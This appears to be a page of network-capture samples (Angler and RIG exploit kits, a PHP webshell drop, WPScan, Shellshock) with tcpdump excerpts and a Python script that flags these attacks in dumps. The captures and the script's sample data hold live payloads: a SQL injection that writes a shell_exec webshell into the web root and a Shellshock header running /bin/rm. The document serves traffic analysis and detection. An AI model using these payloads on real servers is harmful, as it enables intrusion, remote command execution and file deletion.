Angler Exploit Kit (EK) Delivers Simda Malware Banking Trojan PCAP file download traffic sample

2015-03-27 11:14:44.276370 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [.], ack 1, win 256, length 0
2015-03-27 11:14:44.283482 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [P.], seq 1:356, ack 1, win 256, length 355: HTTP: GET /closers_retrenchment_delineation/6715645798 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: [redacted]
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: kiyoshi.noahsbootandshoerepair.com
Connection: Keep-Alive
2015-03-27 11:14:44.539699 IP 188.138.68.234.80 > 192.168.122.34.49193: Flags [.], ack 356, win 123, length 0
2015-03-27 11:14:46.115369 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [.], ack 95637, win 256, length 0
2015-03-27 11:14:47.983190 IP 192.168.122.34.49193 > […]

Webshell shell.php Command Access SSH Server PCAP Analysis File Download

2018-10-14 12:34:34.199552 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 1:334, ack 1, win 229, options [nop,nop,TS val 769026432 ecr 738855], length 333: HTTP: GET /edit_type.php?type_id=-5%20union%20select%20%22%3C?php%20echo%20shell_exec($_GET['cmd']);?%3E%22%20into%20outfile%22/var/www/docs/shell.php%22--%20 HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
2018-10-14 12:34:34.199573 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [.], ack 334, win 1944, options [nop,nop,TS val 738856 ecr 769026432], length 0
2018-10-14 12:34:34.202294 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 1:996, ack 334, win 1944, options [nop,nop,TS val 738856 ecr 769026432], length 995: HTTP: HTTP/1.1 200 OK
Date: Sun, […]

WPScan WordPress Scan Directory Brute Force PCAP file download Traffic Analysis

2017-06-08 21:59:48.303294 IP 192.168.10.101.42588 > 192.168.10.111.80: Flags [P.], seq 9781:9912, ack 33354, win 105, options [nop,nop,TS val 8431 ecr 1099943], length 131: HTTP: GET /wordpress/_old HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: 192.168.10.111
Accept: */*
2017-06-08 21:59:48.303330 IP 192.168.10.101.14193 > 192.168.10.111.55: UDP, length 32
2017-06-08 21:59:48.303429 IP 192.168.10.101.20422 > 192.168.10.111.55: UDP, length 32
2017-06-08 21:59:48.303527 IP 192.168.10.101.30431 > 192.168.10.111.55: UDP, length 32
2017-06-08 21:59:48.303556 IP 192.168.10.111.80 > 192.168.10.101.42588: Flags [P.], seq 33354:33807, ack 9912, win 846, options [nop,nop,TS val 1099943 […]

ShellShock Attack PCAP file Download Traffic Analysis Sample

2017-07-26 16:42:16.277036 IP 130.253.1.120.52744 > 204.79.197.200.80: Flags [P.], seq 15800207:15800243, ack 1402349435, win 115, options [nop,nop,TS val 1182121665 ecr 2059156643], length 36: HTTP: GET /cgi-bin/.svn/entries HTTP/1.1
2017-07-26 16:42:16.277047 IP 130.253.1.120.52744 > 204.79.197.200.80: Flags [P.], seq 36:148, ack 1, win 115, options [nop,nop,TS val 1182121665 ecr 2059156643], length 112: HTTP
Host: db75d9a4f3c95d8a0adffb672c196e96.du.edu
User-Agent: () { :; }; /bin/rm /var/www/default/CVE-2014-6271
2017-07-26 16:42:16.277082 IP 61.7.186.197.5507 > 130.253.185.203.23: Flags [S], seq 0, win 65535, length 0
2017-07-26 16:42:16.277466 IP 60.196.157.234.47651 > 130.253.130.165.1900: UDP, length 94
M-SEARCH * HTTP/1.1
HOST: 239.255.255.250:1900
MAN: ssdp:discover
MX: 10
ST: ssdp:all
2017-07-26 […]

RIG Exploit Kit EK Delivers Cerber Ransomware Malware PCAP file download traffic sample

2016-10-18 14:40:36.304404 IP 10.10.18.102.49185 > 195.133.201.132.80: Flags [P.], seq 1:477, ack 1, win 258, length 476: HTTP: GET /?x3qJc7iVLB3LDIU=l3SKfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJMwNHqpuRQuA60Q6jyLlFdM0ilROKvWBSy7sUUg4T6BgY0Q HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.basket-brabant.be/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: add.jamesthorpebourbon.com
Connection: Keep-Alive
2016-10-18 14:40:36.504124 IP 195.133.201.132.80 > 10.10.18.102.49185: Flags [.], ack 477, win 237, length 0
2016-10-18 14:40:37.014717 IP 195.133.201.132.80 > 10.10.18.102.49185: Flags [.], seq 1:1322, ack 477, win 237, length 1321: HTTP: HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Tue, 18 Oct 2016 18:40:36 GMT
Content-Type: text/html; […]
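A small triage script for tcpdump text dumps like the ones above, added here as an example; it is not code from this page or from any of the sample captures. It groups tcpdump -A output into packets, pulls out the HTTP request line and headers, and flags the two attack patterns visible in the webshell and Shellshock sections: a UNION SELECT ... INTO OUTFILE that writes a <?php tag into the web root, and a Bash function definition () { :; }; carried in a request header. The sample dump is constructed from the request lines shown on this page; the follow-up GET /shell.php?cmd=id request is an assumption about how the dropped shell would be used and is not taken from the capture. One caveat it handles: tcpdump prints each TCP segment separately, and in the Shellshock capture the request line and the headers are in different segments, so the header check does not require the request line to be in the same packet (proper TCP stream reassembly, as in Wireshark's Follow TCP Stream, is the real fix).

```python
"""Triage HTTP requests in a tcpdump -A style text dump for the webshell
and Shellshock patterns seen in the captures above.  Added example, not
code from the page or from the sample PCAPs."""
import re
from urllib.parse import unquote

# Summary line tcpdump prints for every packet: timestamp, 5-tuple, rest.
SUMMARY_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+) IP "
    r"(?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+): (?P<rest>.*)$"
)
REQUEST_RE = re.compile(r"\b(?P<method>GET|POST|HEAD|PUT|OPTIONS) (?P<uri>\S+) HTTP/1\.[01]")
HEADER_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*):\s?(.*)$")

# Classic Shellshock trigger only; later bash variants use different bodies.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")
SQLI_OUTFILE_RE = re.compile(r"union\s+select\b.*\binto\s+outfile", re.I | re.S)
PHP_TAG_RE = re.compile(r"<\?php", re.I)
CMD_PARAM_RE = re.compile(r"(^|&)cmd=")

# Constructed sample modelled on the captures above (binary noise stripped).
# The /shell.php?cmd=id request is an assumption, not from the real PCAP.
SAMPLE = """\
2018-10-14 12:34:34.199552 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 1:334, ack 1, win 229, length 333: HTTP: GET /edit_type.php?type_id=-5%20union%20select%20%22%3C?php%20echo%20shell_exec($_GET['cmd']);?%3E%22%20into%20outfile%22/var/www/docs/shell.php%22--%20 HTTP/1.1
Host: 10.1.2.100
User-Agent: python-requests/2.9.1
2018-10-14 12:34:34.202294 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 1:996, ack 334, win 1944, length 995: HTTP: HTTP/1.1 200 OK
2018-10-14 12:34:40.100000 IP 192.0.2.50.45758 > 10.1.2.100.80: Flags [P.], seq 1:120, ack 1, win 229, length 119: HTTP: GET /shell.php?cmd=id HTTP/1.1
Host: 10.1.2.100
2017-07-26 16:42:16.277036 IP 130.253.1.120.52744 > 204.79.197.200.80: Flags [P.], seq 15800207:15800243, ack 1402349435, win 115, length 36: HTTP: GET /cgi-bin/.svn/entries HTTP/1.1
2017-07-26 16:42:16.277047 IP 130.253.1.120.52744 > 204.79.197.200.80: Flags [P.], seq 36:148, ack 1, win 115, length 112: HTTP
Host: db75d9a4f3c95d8a0adffb672c196e96.du.edu
User-Agent: () { :; }; /bin/rm /var/www/default/CVE-2014-6271
2017-06-08 21:59:48.303294 IP 192.168.10.101.42588 > 192.168.10.111.80: Flags [P.], seq 9781:9912, ack 33354, win 105, length 131: HTTP: GET /wordpress/_old HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
"""


def parse_packets(text):
    """Group the dump into packets: the summary fields plus the payload
    lines tcpdump -A prints after each summary line."""
    packets = []
    for line in text.splitlines():
        m = SUMMARY_RE.match(line)
        if m:
            packets.append({**m.groupdict(), "payload": []})
        elif packets and line.strip():
            packets[-1]["payload"].append(line)
    return packets


def classify(pkt):
    """Return a list of finding strings for one packet (empty if clean)."""
    findings = []
    # Header checks run on the raw payload lines.  The request line and the
    # headers may sit in different TCP segments (as in the Shellshock capture),
    # so a header finding must not depend on seeing the request line here.
    for line in pkt["payload"]:
        h = HEADER_RE.match(line)
        if h and SHELLSHOCK_RE.search(h.group(2)):
            findings.append(f"shellshock payload in {h.group(1)} header")
    # URL checks need the request line; %xx-decode so the injected SQL and
    # the <?php tag appear as MySQL and PHP will see them.
    r = REQUEST_RE.search(" ".join([pkt["rest"]] + pkt["payload"]))
    if r:
        uri = unquote(r.group("uri"))
        path, _, query = uri.partition("?")
        if SQLI_OUTFILE_RE.search(uri) and PHP_TAG_RE.search(uri):
            findings.append("sqli UNION ... INTO OUTFILE writing PHP (webshell drop)")
        if path.lower().endswith(".php") and CMD_PARAM_RE.search(query):
            findings.append("command execution via cmd= parameter")
    return findings


def triage(text):
    """Run classify() over every packet; return (ts, src, dst, findings) hits."""
    hits = []
    for p in parse_packets(text):
        findings = classify(p)
        if findings:
            hits.append((p["ts"], p["src"], p["dst"], findings))
    return hits


if __name__ == "__main__":
    for ts, src, dst, findings in triage(SAMPLE):
        print(ts, src, "->", dst, "; ".join(findings))
```

Run it on a real dump with `tcpdump -A -r capture.pcap 'tcp port 80' > dump.txt` and pass the file contents to triage(); the hex/ASCII noise lines tcpdump emits are ignored because they never match a header or request pattern.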